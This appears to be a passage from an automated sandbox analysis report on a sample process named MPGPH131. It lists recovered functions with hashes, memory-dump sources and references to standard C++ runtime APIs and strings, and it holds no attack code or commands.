Opcode ID: e0ace055ef26c08d6470144120180d9ea5b87672e43fae9bd7f0efa4cb0aa9d9
Instruction ID: 4af5b5707e6a0df109435ff332414419204fd63d9d1163cf88c5bf4cccd9cc2f
Opcode Fuzzy Hash: e0ace055ef26c08d6470144120180d9ea5b87672e43fae9bd7f0efa4cb0aa9d9
Instruction Fuzzy Hash: 370126AB34D1A2FEC6020DD11B866F6BF2AEB93231331403EF44785043FA491B0BA5A1

Function 04FC00AA Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04fd4d8937f928c434c4f89279031187935e3b940886f916797c05766e8ce9cc
Instruction ID: 96ad16b355d14d3e04f5627044dfbba680d8447fb1d0c08acb28269576da7df1
Opcode Fuzzy Hash: 04fd4d8937f928c434c4f89279031187935e3b940886f916797c05766e8ce9cc
Instruction Fuzzy Hash: 04F0B4AB38C063FEC1021DD14F896B5BB1AA7A2271321402DF04755503BE49670BA5A1

Function 04FC0101 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab7cb1b0f1e9559b79de2d54270f0aa213410a426e9da91d06cb0cd4b6592bf2
Instruction ID: 1c44a08fec1646e492751d3ca59580828718f18c3c14db53b7edf514b9cdbb51
Opcode Fuzzy Hash: ab7cb1b0f1e9559b79de2d54270f0aa213410a426e9da91d06cb0cd4b6592bf2
Instruction Fuzzy Hash: 13F0E29B34C0A3EE85061DD24F896FAFF6AAA92275331003EF08781113BE45670BA560

Function 04FC011B Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b12241fb87cc64a466c588c61dce8b3294077d3c7a17e6ac97dfac34ecf53d7
Instruction ID: 86b6e4f871dbe19792a7db7e12f69b9be84e72305feebbf35aa05f21203fcbed
Opcode Fuzzy Hash: 1b12241fb87cc64a466c588c61dce8b3294077d3c7a17e6ac97dfac34ecf53d7
Instruction Fuzzy Hash: 81D092AF24C062EEA4414DD22B0A676EA29A3E2231370842BF05785042BE5A670FB530

Non-executed Functions

Function 04FB008C Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5d8f09ed06dc28f4eac24441af2dd0b42024b1824c1418e6269509fcc719256
Instruction ID: 88a00da5361590f2b6bce44c488c101098d78fca0936eb290dedceefe3c61ad5
Opcode Fuzzy Hash: b5d8f09ed06dc28f4eac24441af2dd0b42024b1824c1418e6269509fcc719256
Instruction Fuzzy Hash: E5F02BD360DBA46EA55294235B519FB2F2CF6933F83318557F4C7C6482EA08298F61F1

Function 00B1A120 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B1A143
std::_Lockit::_Lockit.LIBCPMT ref: 00B1A165
std::_Lockit::~_Lockit.LIBCPMT ref: 00B1A185
std::_Lockit::~_Lockit.LIBCPMT ref: 00B1A1AF
std::_Lockit::_Lockit.LIBCPMT ref: 00B1A21D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00B1A269
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00B1A283
std::_Lockit::~_Lockit.LIBCPMT ref: 00B1A318
std::_Facet_Register.LIBCPMT ref: 00B1A325

Strings

bad locale name, xrefs: 00B1A33F

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: 7c73dfb67b9350a1d9440c59c08f9e27c15b2e6d5a2ec30447569bd7165b136d
Instruction ID: 1c31f9b67f7353acd85aa191f0651b1bba2dfc16eb672bb90e8a8894736f2356
Opcode Fuzzy Hash: 7c73dfb67b9350a1d9440c59c08f9e27c15b2e6d5a2ec30447569bd7165b136d
Instruction Fuzzy Hash: A4616DB1D01248ABEF11DFA4D885BDEBBF4AF15310F5440A9E804AB351EB74E945CB92

Function 00AB3770 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00AB37E9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AB3835
__Getctype.LIBCPMT ref: 00AB384E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00AB386A
std::_Lockit::~_Lockit.LIBCPMT ref: 00AB38FF

Strings

bad locale name, xrefs: 00AB391C

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1840309910-1405518554
Opcode ID: 7c5026ce55ebd24fdb4a84e4a177c61004b189f5fe22b144e5cd2ec10522e956
Instruction ID: 5a568cb7bf7b580ca51d0cbdf8568b1f8e2f7a44432782997672ef72e0d77e5c
Opcode Fuzzy Hash: 7c5026ce55ebd24fdb4a84e4a177c61004b189f5fe22b144e5cd2ec10522e956
Instruction Fuzzy Hash: 1B5130B2D002489BEF10DFE4D845BDEFBF8AF14710F144169E815AB342E775AA45CB92

Function 00B8FB30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00B8FB67
___except_validate_context_record.LIBVCRUNTIME ref: 00B8FB6F
_ValidateLocalCookies.LIBCMT ref: 00B8FBF8
__IsNonwritableInCurrentImage.LIBCMT ref: 00B8FC23
_ValidateLocalCookies.LIBCMT ref: 00B8FC78

Strings

csm, xrefs: 00B8FC0D

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: d20dd6ea4abd7519c5fa889bb64a10410c79e7159f8a2c26ba46cbc97ba97a7b
Instruction ID: 97d3bd18c6fa46e2b6ccbb7ea36dc0064968b37612fa2f3397dd5299d65e515c
Opcode Fuzzy Hash: d20dd6ea4abd7519c5fa889bb64a10410c79e7159f8a2c26ba46cbc97ba97a7b
Instruction Fuzzy Hash: 76418630A002099BCF10FF68C895AAEBBF5EF45324F1481E5EC149B3A2D771EA55CB91

Function 00B188E0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B18903
std::_Lockit::_Lockit.LIBCPMT ref: 00B18926
std::_Lockit::~_Lockit.LIBCPMT ref: 00B18946
std::_Facet_Register.LIBCPMT ref: 00B189BB
std::_Lockit::~_Lockit.LIBCPMT ref: 00B189D3
Concurrency::cancel_current_task.LIBCPMT ref: 00B189EB

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 36622bbff23c417db79e5455106890e21b916cb544cef1d5dd4a1b1d8b2e337c
Instruction ID: 9fef14cf03083a510d955d48e3857d8c0d7c5daea8cab51a04fc35088b44c229
Opcode Fuzzy Hash: 36622bbff23c417db79e5455106890e21b916cb544cef1d5dd4a1b1d8b2e337c
Instruction Fuzzy Hash: 2A41E271900259DFCF10DF54D881AAEBBF5FB05360F5442AAE915AB361DB30AE80CBD2

Function 00AB5DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 424COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00AB60F2
___std_exception_destroy.LIBVCRUNTIME ref: 00AB617F
___std_exception_copy.LIBVCRUNTIME ref: 00AB6248

Strings

recursive_directory_iterator::operator++, xrefs: 00AB61CC

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: recursive_directory_iterator::operator++
API String ID: 1206660477-953255998
Opcode ID: 835b01908be9d61120e91b30b96a91f5e75459aee68c2b44e49f0b4680c020b9
Instruction ID: ccefc026624453d60dbb2275f385abe3c79396f4e2f129c8c863f68e62bd4c88
Opcode Fuzzy Hash: 835b01908be9d61120e91b30b96a91f5e75459aee68c2b44e49f0b4680c020b9
Instruction Fuzzy Hash: 3BE1F0B19006049FDB28DF68D845BAEFBF9FF44300F14866DE41693792D774AA44CBA1

Function 00AB84C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00AB86DE
___std_exception_destroy.LIBVCRUNTIME ref: 00AB86ED

Strings

at line , xrefs: 00AB8518
, column , xrefs: 00AB8555, 00AB856B

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: dcd0f1b1e9dceb4bf7418138b0995b38554a973125db0126b28c8abff1197006
Instruction ID: cacc5ba0a5a996d98431dee7878d5519754ae1be669a52d33cb86c71b668c157
Opcode Fuzzy Hash: dcd0f1b1e9dceb4bf7418138b0995b38554a973125db0126b28c8abff1197006
Instruction Fuzzy Hash: EB610671A002049FDB08DF6CCC85BEDBBB9EF44300F148658E415A7792EB78AA80CB95

Function 00B22750 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00B22BD6
___std_exception_destroy.LIBVCRUNTIME ref: 00B22BEF
___std_exception_destroy.LIBVCRUNTIME ref: 00B22D27
___std_exception_destroy.LIBVCRUNTIME ref: 00B22D40
___std_exception_destroy.LIBVCRUNTIME ref: 00B22EA6
___std_exception_destroy.LIBVCRUNTIME ref: 00B22EBF
___std_exception_destroy.LIBVCRUNTIME ref: 00B23709
___std_exception_destroy.LIBVCRUNTIME ref: 00B23722

Strings

value, xrefs: 00B2362F

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 91abd5cb8b3f94f8c85e7a21865e5fa36d148b373a1e2f2be7aada1d6f59f45d
Instruction ID: ffac10b0a24f827730619cdf657bc7d0e1569dda3e1166fafd3e2a65356f412f
Opcode Fuzzy Hash: 91abd5cb8b3f94f8c85e7a21865e5fa36d148b373a1e2f2be7aada1d6f59f45d
Instruction Fuzzy Hash: F351B2B0C00258DBDF14EFA4DC85BDEBBF5AF05304F148299E449A7392D7786A89CB61

Function 00AB3B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00AB3C0F

Strings

ios_base::badbit set, xrefs: 00AB3BA7, 00AB3BD2, 00AB3BF3
ios_base::eofbit set, xrefs: 00AB3BB6
ios_base::failbit set, xrefs: 00AB3AC8, 00AB3BB1

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2659868963-1866435925
Opcode ID: c487316624e53e978aac126d7693165d634547999407734f49dd5dc359a5fe24
Instruction ID: 0739dccd9c3407a504e68a4cf16a71caf3cdd6af09a9a34b08cde7136e8c99d6
Opcode Fuzzy Hash: c487316624e53e978aac126d7693165d634547999407734f49dd5dc359a5fe24
Instruction Fuzzy Hash: 1D11A1B39107056BCB10DF59C805FEAB7ECEB15310F0485AAFA589B242EBB0E954CB91

Function 00B21CF0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 00B221D3

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID:
String ID: unordered_map/set too long
API String ID: 0-306623848
Opcode ID: e492b31f5f669ad142f343393e775b2d5e762a9a566be8547cb71e983a5630a7
Instruction ID: bbb1e9ca95b4e0184069a13de1e76b94658dc4bb51ab48955b7e6b84f93918e1
Opcode Fuzzy Hash: e492b31f5f669ad142f343393e775b2d5e762a9a566be8547cb71e983a5630a7
Instruction Fuzzy Hash: BAE1DF71A002159FCB18DF6CD980AA9B7F5FF58310B1487AAE819EB395E730E951CB90

Function 00AB8080 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00AB844D

Strings

ror, xrefs: 00AB80D4
parse error, xrefs: 00AB8149, 00AB8162

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
